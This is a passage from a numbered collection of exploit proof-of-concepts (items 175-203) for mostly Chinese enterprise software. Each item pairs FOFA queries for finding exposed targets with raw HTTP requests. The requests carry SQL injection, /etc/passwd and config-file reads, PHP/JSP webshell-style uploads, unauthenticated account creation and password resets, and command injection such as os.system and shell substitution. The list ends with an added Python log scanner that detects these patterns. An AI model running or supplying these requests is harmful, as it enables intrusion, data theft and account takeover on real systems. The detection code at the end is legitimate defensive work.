GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON clinical viewer) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Stacked-query, time-based check against SQL Server: the decoded parameter is 1';WAITFOR DELAY '0:0:5'--, so a vulnerable host answers about 5 seconds late.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

Note the file:// scheme: the poi value is fetched as a URL, which is what makes the local file read possible.

191. 亿赛通电子文档安全管理系统 (electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

The /js/../ segment is deliberate: it reaches NavigationAjax through a static-resource path that the authentication filter does not cover. Send the request with a client that does not normalize the path, or the bypass is lost. The waitfor delay makes this a 5-second time-based check on SQL Server.

192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

// Minimal ASP.NET generic handler; the stored .ashx answers "test" when requested.
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The request body is the raw handler source; the name=.ashx query parameter controls the extension the file is stored with.

193. 山石网科云鉴安全管理系统 (Hillstone 云鉴 security management system) setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
First obtain a CSRF token using a made-up PHPSESSID value (no authenticated session is needed):
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Then pass that token as token_csrf. The param value is interpreted as Python, which is why the payload is an os.system() call; it writes a marker file under the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Finally fetch the marker file; a response containing 23333333333456 confirms execution:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the endpoint is exposed and the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename carries a path traversal, so the JSP is written straight into the deployed fe.war rather than into the attachment directory.

195. 飞鱼星上网行为管理系统 (internet access behavior management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is passed to a shell unescaped; the leading semicolon terminates the intended command and the trailing echo swallows whatever follows the injection point.

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

xgh is the account identifier (学工号, student/staff number) whose password is set to newPass; the endpoint requires no authentication.

197. 浙大恩特客户资源管理系统 (customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

The ;.js suffix is a matrix-parameter trick that makes the request look like a static resource to the authentication filter. Look for 12321 (111*111) in the response as the injection marker.

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls / >/www/aaa.txt` (backtick command substitution). The request carries a LuCI sysauth session cookie, so this is a post-authentication issue.

199. Cockpit assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Request the login page to obtain the csfr token (a JWT):
GET /auth/login?to=/ HTTP/1.1

Response: 200; the page contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token to obtain a session cookie (the POC authenticates as admin/admin, so weak credentials are the precondition):
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session, then request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Time-based check on MySQL: the subquery sleep(5) delays the response of a vulnerable host by about 5 seconds. The payload avoids spaces entirely, so it also gets past simple space-stripping filters.

201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName is concatenated into the query unescaped; the stacked WAITFOR DELAY '0:0:5' makes this a 5-second time-based check on SQL Server.

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
First fetch the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then substitute those __VIEWSTATE and __EVENTVALIDATION values into the upload request (ASP.NET rejects a postback whose values do not match the page that was served):
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Note that the part declares Content-Type image/jpeg while the filename is 11.jsp: the extension, not the declared type, decides what the server stores and executes.

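The post says its purpose is to let defenders check for exposure. The following is an added example, not code from the original post or from any vendor named above: a Python sweep of a combined-format (Apache/Nginx) web access log for the endpoints and query-string markers that appear in items 186 to 203. It normalizes the two filter-bypass spellings used above (the /js/../ dot segment in 191 and the ;.js matrix suffix in 197) before matching, so those variants still land on the right endpoint. The log lines embedded in it are constructed samples. Endpoint hits are leads to triage, not proof of exploitation (administrators legitimately use several of these URLs), and because POST bodies never reach an access log, the POST-based items can only be matched on path.

```python
"""Added example for this list (not code from the original post or from any
vendor named above): sweep a combined-format web access log for the endpoints
and query-string markers seen in items 186-203, so a defender can look for
earlier exploitation attempts. The log lines below are constructed samples."""
import posixpath
import re
from urllib.parse import unquote, unquote_plus

# Endpoints taken from the POCs above, keyed by normalized path. A hit is a lead
# to triage, not proof of compromise: admins legitimately use some of these URLs.
ENDPOINTS = {
    "/admin/pr_monitor/getting_index_data.php": "186 DataCube3 SQLi",
    "/index.cfm/_api/json/v1/default": "187 Mura CMS processAsyncObject SQLi",
    "/attachment": "188 Jiahui attachment file read",
    "/xds/deleteStudy.php": "189 LANWON deleteStudy SQLi",
    "/index.php/admin/Userinfo/poihuoqu": "190 poihuoqu file read",
    "/CDGServer3/NavigationAjax": "191 NavigationAjax SQLi",
    "/JoinfApp/EMail/UploadEmailAttr": "192 UploadEmailAttr upload",
    "/master/ajaxActions/setSystemTimeAction.php": "193 setSystemTimeAction RCE",
    "/servlet/uploadAttachmentServlet": "194 uploadAttachmentServlet upload",
    "/send_order.cgi": "195 send_order.cgi RCE",
    "/cas/userCtl/resetPasswordBySuper": "196 resetPasswordBySuper",
    "/entsoft/Quotegask_editAction.entweb": "197 Quotegask_editAction SQLi",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198 aliyundrive-webdav RCE",
    "/assetsmanager/upload": "199 Cockpit assetsmanager upload",
    "/js/player/dmplayer/dmku": "200 SeaCMS dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 Founder binary.do SQLi",
    "/User/AccountEdit.aspx": "202 AccountEdit upload",
    "/RedseaPlatform/PtFjk.mob": "203 Redsea PtFjk upload",
}

# Markers from the GET-based POCs, checked against the URL-decoded query string.
# POST bodies never reach the access log, so POST-only items match by path alone.
PAYLOAD_RULES = [
    ("time-based SQLi (sleep)", re.compile(r"\bsleep\s*\(", re.I)),
    ("time-based SQLi (waitfor delay)", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("union-based SQLi", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("file read / traversal", re.compile(r"/etc/passwd|file://|\.\./", re.I)),
    ("shell substitution", re.compile(r"`|\$\(")),
]

# Apache/Nginx "combined" format; only the request line and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)


def normalize_path(raw_path):
    """Percent-decode once, drop per-segment matrix params (the ';.js' suffix in
    item 197) and collapse dot segments (the 'js/../' trick in item 191), so the
    filter-bypass spellings still land on the same endpoint key."""
    decoded = unquote(raw_path)
    no_matrix = "/".join(seg.split(";", 1)[0] for seg in decoded.split("/"))
    return "/" + posixpath.normpath(no_matrix).lstrip("/")


def match_endpoint(norm_path):
    for prefix, label in ENDPOINTS.items():
        if norm_path == prefix or norm_path.startswith(prefix + "/"):
            return label
    return None


def scan_log(text):
    """Return [(line_no, [rule, ...]), ...] for every line with at least one hit."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip rather than guess
        raw_path, _, raw_query = m.group("target").partition("?")
        rules = []
        label = match_endpoint(normalize_path(raw_path))
        if label:
            rules.append(label)
        query = unquote_plus(raw_query)  # '+' means space in the query part only
        rules.extend(name for name, rx in PAYLOAD_RULES if rx.search(query))
        if rules:
            hits.append((line_no, rules))
    return hits


# Constructed sample log, not captured from any real system.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:01:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:01:09 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:10:02:31 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:10:02:40 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:10:03:15 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%60 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2024:10:04:00 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 6 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2024:10:04:03 +0800] "GET /index.php?s=/news/list HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2024:10:04:10 +0800] "POST /User/Login.aspx HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for line_no, rules in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(rules)}")
```

Run it against a real log by reading the file into scan_log() instead of SAMPLE_LOG. Decoding is done once on purpose: double-decoding would turn a harmless literal %2527 into a quote and produce noise, while a single decode is what the web server itself applies. Add the remaining items from the full list to ENDPOINTS in the same way, and treat any match on a time-based marker as a strong signal, since there is no legitimate reason for sleep() or WAITFOR DELAY to appear in a query string.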